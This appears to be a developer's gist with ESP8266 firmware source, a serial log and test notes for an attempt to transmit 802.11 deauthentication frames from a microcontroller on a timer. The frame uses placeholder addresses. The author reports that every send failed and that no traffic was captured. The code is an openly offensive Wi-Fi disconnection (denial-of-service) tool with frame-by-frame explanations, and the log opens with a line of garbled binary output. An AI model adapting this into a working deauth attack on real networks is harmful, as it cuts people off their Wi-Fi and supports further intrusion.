
@stickytruth
Created November 2, 2015 17:56
rl��r��#�n����p�<�b�$�rrp�l�����p��n�`rn|��n�܀�r����~�n���l`��#�n��;nr���;��?��rp�n���pp��<����b�ľ~�n�����rnr���;��?�l��r��l`�don't use rtc mem data
r�
SDK version:1.4.0
mode : sta(5c:cf:7f:01:5b:09)
add if0
0 = wifi_register_send_pkt_freedom_cb()
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:10:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:20:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:30:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:40:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:50:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:60:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:70:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:80:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:90:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:A0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:B0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:C0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:D0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:E0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:F0:00:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:01:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:11:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:21:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:31:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:41:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:51:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:61:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:71:01:07:00, 26, 0)
-1 = wifi_send_pkt_freedom(C0:00:00:00:63:6C:69:65:6E:74:61:70:6F:69:6E:74:61:70:6F:69:6E:74:81:01:07:00, 26, 0)
Hardware: Adafruit Huzzah, uses the ai-thinker ESP-12
Environment: Both Espressif SDK and esp-open-sdk
Testing: tcpdump captures on Linux using a USB Wi-Fi card in monitor mode, and on OS X using the built-in Wi-Fi in monitor mode.
There was minimal wifi traffic during tests, basically 1 AP and 2-3 clients on the channel.
Results: No traffic was seen from the esp.
#include "ets_sys.h"
#include "osapi.h"
#include "gpio.h"
#include "os_type.h"
#include "mem.h"
#include "user_config.h"
#include "user_interface.h"
#include "driver/uart.h"
#define user_procTaskPrio 0
#define user_procTaskQueueLen 1
/* System-task queue; declared here but not referenced anywhere in this file. */
os_event_t user_procTaskQueue[user_procTaskQueueLen];
/* Repeating timer that drives deauth(); armed in user_init(). */
static volatile os_timer_t deauth_timer;
/* Current 802.11 Sequence Control value; advanced by deauth() and written
 * into bytes 22-23 of the frame by write_packet(). */
uint16_t seq_n = 0;
// Packet buffer (64 bytes; only the first 26 are filled by write_packet())
uint8_t packet_buffer[64];
// Pre-formed packet: a 26-byte 802.11 deauthentication frame template.
// The three address fields are ASCII placeholders ("client", "apoint"), not real MACs.
uint8_t deauth_packet[26] = {0xC0, 0x00, // Frame control: management type, deauthentication subtype
0x00, 0x00, // Duration
0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, // Client MAC (address 1) -- ASCII "client"
0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC (address 2) -- ASCII "apoint"
0x61, 0x70, 0x6f, 0x69, 0x6e, 0x74, // AP MAC (address 3 / BSSID) -- ASCII "apoint"
0x00, 0x00, // Sequence control (overwritten on every send by write_packet())
0x07, 0x00}; // Reason code 7, little-endian: class 3 frame received from non-associated STA
/* Number of bytes of the template handed to wifi_send_pkt_freedom(). */
uint16_t deauth_size = 26;
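/* A utility to print buffers: writes buf[start .. len-1] as two-digit
 * upper-case hex bytes separated by ':' via os_printf, with no trailing
 * newline.
 *
 * Note: despite its name, `len` is an exclusive end index, not a byte count.
 * The only caller passes start = 0 and len = deauth_size, so the two
 * readings coincide there; the parameter is kept as-is for compatibility.
 *
 * Fix: the separator test used to be `i > 0`, which printed a leading ':'
 * for any non-zero start. It now compares against `start`, and the index
 * is the same unsigned width as the bounds. */
void print_buffer(uint8_t *buf, uint16_t start, uint16_t len) {
    uint16_t i;
    for (i = start; i < len; i++) {
        if (i > start) os_printf(":");
        os_printf("%02X", buf[i]);
    }
}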
/* Copies deauth_packet into buf and stamps the Sequence Control field.
 * buf must hold at least 26 bytes (the only caller passes the 64-byte
 * packet_buffer). seq is split with % 0xFF and / 0xFF, i.e. in base 255,
 * rather than into its low and high bytes. */
void write_packet(uint8_t *buf, uint16_t seq)
{
uint8_t i=0;
for (i=0; i<26; i++) buf[i] = deauth_packet[i];
/* Earlier experiment, kept for the record: I got desperate for any output
here and also stamped seq over bytes 0-1 (the frame control field).
Still didn't observe any traffic.
buf[0] = seq / 0xFF;
buf[1] = seq % 0xFF;
*/
buf[22] = seq % 0xFF;
buf[23] = seq / 0xFF;
}
/* Sends one deauth frame per timer tick.
 * Called from deauth_timer (see user_init()). It is declared without
 * parameters yet installed through a cast to os_timer_func_t, so the cast
 * hides that signature mismatch. The serial log above shows
 * wifi_send_pkt_freedom() returning -1 on every call.
 * Mitigation note: receivers with 802.11w (protected management frames)
 * enabled discard unauthenticated deauthentication frames such as this one. */
void deauth()//void *arg)
{
// Sequence number is increased by 16, see 802.11: the Sequence Control
// field keeps the fragment number in its low 4 bits, so +0x10 advances the
// sequence number by one.
seq_n = seq_n + 0x10;
if (seq_n > 0x2fc) seq_n = 0x00; // 764 -- wrap back to 0 once past this bound
write_packet(packet_buffer, seq_n);
// Log line: return value first, then the frame bytes, length and flags.
os_printf("%d = wifi_send_pkt_freedom(", wifi_send_pkt_freedom(packet_buffer, deauth_size, 0));
print_buffer(packet_buffer, 0, deauth_size);
os_printf(", %d, 0)\n", deauth_size);
// wifi_send_pkt_freedom has always returned -1 (fail)
}
/* Callback for sent packets.
From the SDK docs:
Note:
Only after the previous packet was sent, entered the freedom_outside_cb_t,
the next packet is allowed to send.
I've never seen this get called -- consistent with the serial log above,
which contains no "[pkt-cb]" line. The message has no trailing newline, so
if it ever fired it would run into the next os_printf output.
*/
//void ICACHE_FLASH_ATTR callback_send_pkt_freedom(uint8 status)
void callback_send_pkt_freedom(uint8 status)
{
os_printf_plus("[pkt-cb] %d", status);
}
/* Runs once the SDK reports initialization complete (registered via
 * system_init_done_cb() in user_init()). Pins the radio to channel 1 and
 * installs the send-complete callback. */
void ICACHE_FLASH_ATTR
callback_system_init_done(void)
{
// Set channel
wifi_set_channel(1);
// Register callback for sent packets; the return value is printed so it
// appears in the serial log ("0 = wifi_register_send_pkt_freedom_cb()").
os_printf("%d = wifi_register_send_pkt_freedom_cb()\n", wifi_register_send_pkt_freedom_cb(callback_send_pkt_freedom));
// Has always returned 0 (succeed) for me
}
/* SDK entry point. Brings up the UART for logging, selects station mode,
 * arms the repeating deauth timer and defers radio setup to
 * callback_system_init_done(). */
void ICACHE_FLASH_ATTR
user_init()
{
// UART0/UART1 baud rates; os_printf output goes to the serial console.
uart_init(115200, 115200);
os_printf("\n\nSDK version:%s\n", system_get_sdk_version());
wifi_set_opmode(STATION_MODE);
// The SDK requires the timer to be disarmed before os_timer_setfn().
os_timer_disarm(&deauth_timer);
// deauth() takes no parameters; the cast to os_timer_func_t silences the
// prototype mismatch rather than fixing it.
os_timer_setfn(&deauth_timer, (os_timer_func_t *) deauth, NULL);
// CHANNEL_HOP_INTERVAL is not defined in this file -- presumably it comes
// from user_config.h (TODO confirm). The trailing 1 is the repeat flag.
os_timer_arm(&deauth_timer, CHANNEL_HOP_INTERVAL, 1);
system_init_done_cb(callback_system_init_done);
}